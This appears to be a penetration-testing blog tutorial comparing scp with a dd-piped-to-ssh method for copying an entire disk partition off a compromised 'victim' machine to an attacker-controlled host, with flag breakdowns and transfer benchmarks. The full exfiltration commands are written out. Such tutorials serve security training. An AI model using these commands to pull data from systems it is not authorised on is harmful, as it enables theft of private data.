Introduction
Sometimes, when looking through files for useful information after exploiting a box, you might run into a small file system or particularly interesting disk partition. Due to time constraints and the need for specialized analysis tools it might be helpful or even necessary to exfiltrate the entire partition. In these cases, we can combine the powers of dd as a data duplication tool and ssh as a means of securely and reliably transferring data to efficiently bring the remote partition to our local attack machine.
Methods Covered in this Section
- scp Recursive File Transfer via Secure Shell:
scp -C -r /data/ root@10.0.0.5:/root/Desktop/data
- dd + ssh Compressed Data Exfil over Encrypted Channel:
dd if=/dev/sdb1 bs=65536 conv=noerror,sync | ssh -C root@10.0.0.5 "cat > /root/Desktop/data.dd"
Take for example the output of this df command:
Assuming that the device mounted to /data has interesting information and we want to take it all for further analysis we could try to recursively copy it over with scp:
scp Recursive File Transfer via Secure Shell:
scp -C -r /data/ adhd@10.0.0.210:/home/adhd/Desktop/data
Command Breakdown
scp -C -r /data/ adhd@10.0.0.210:/home/adhd/Desktop/data
1. scp - Command line tool for file transfer via secure shell
2. -C - Enable compression flag within ssh
3. -r - Recurse directory copying all files, directories, and links
4. /data/ - Local directory to be transferred
5. adhd@10.0.0.210: - Destination user@IP
6. /home/adhd/Desktop/data - Destination folder to copy files into
This provides a file-by-file copy mechanism that will bring copies of all files in the /data directory back to the pentester's system. Measuring performance in terms of time, bandwidth used, and data pulled across multiple executions provided the following metrics:
Execution time: 23.643s — Data brought to attack system: 684,756,992 bytes — Bytes on wire: 719,593,027
Doing a quick comparison we can see that the compression of scp on our test dataset ( ~685MB random data split into 653 files) was completely ineffective. In fact, the compression actually bloated the amount of data transmitted on the wire; data sent was approximately 105% the size of the data on disk.
Maybe dd + ssh will provide a superior alternative?
By using the dd command we can perform a byte-by-byte copy of the underlying partition that is mounted to the /data directory. Copying data this way will bring back the entire partition, slack space included, so that disk forensics tools can even be used to recover data that has been deleted from the victim machine.
dd + ssh Compressed Data Exfil over Encrypted Channel:
dd if=/dev/sdb1 bs=65536 conv=noerror,sync | ssh -C adhd@10.0.0.210 "cat > /home/adhd/Desktop/data.dd"
Command Breakdown Cont.
dd if=/dev/sdb1 bs=65536 conv=noerror,sync | ssh -C adhd@10.0.0.210 "cat > /home/adhd/Desktop/data.dd"
1. dd - Command line tool to copy files byte-by-byte
2. if=/dev/sdb1 - In File, specifies the file to be copied
3. bs=65536 - Buffer of bytes to read/write concurrently
4. conv=noerror,sync - Convert file,continue after read errors, include metadata
5. | - Pushes dd output into ssh command
6. ssh - Command line tool to connect to remote systems via Secure Shell
7. -C - Enable compression flag within ssh
8. adhd@10.0.0.210 - Destination user@IP
9. "cat > /home/adhd/Desktop/data.dd" - Destination image to copied into
In the above dd command we use the In File switch "(if=)" to specify the input file for duplication (in this case "/dev/sdb1", the underlying partition which is mounted on "/data)". The byte size "(bs=)" argument is used to specify the byte size; the number of bytes to be read concurrently. Because the output of this dd command is being directed (via | operator) into the ssh command to stream data to the attack station we specified 65536 bytes, this is generally the maximum capacity of the pipe buffer "(PIPE_BUF)" on Unix systems though this can vary wildly. The convert "(conv=)" arguments of noerror and sync are commonly used when making backup images. They allow dd to continue image creation when read errors occur and to replace missing data in the created image with null bytes to preserve as much of the original image as possible. For performance statistics the above command was run multiple times and yielded the following metrics:
Execution time: 23.726s - Data brought to attack system: 1,072,693,248 bytes - Bytes on wire: 723,521,089
So with dd + ssh running on the same dataset of completely random data, compression functioned as intended and data transmitted was approximately 67% the size of the data on disk. Additionally, the execution time was only .083 seconds slower despite the 56.6% larger byte-by-byte disk image that was transferred.
Conclusion
In additional testing the dd + ssh option continued to performed. Even against standalone files dd + ssh performance was nearly identical to or outperformed the scp alternative. While this won't hold true in every scenario, and while there are definitely some cases where scp would be the better option, dd + ssh provides a robust solution to enable controlled, compressed, and encrypted mass data transfer.
Matthew Toussain
https://twitter.com/0sm0s1z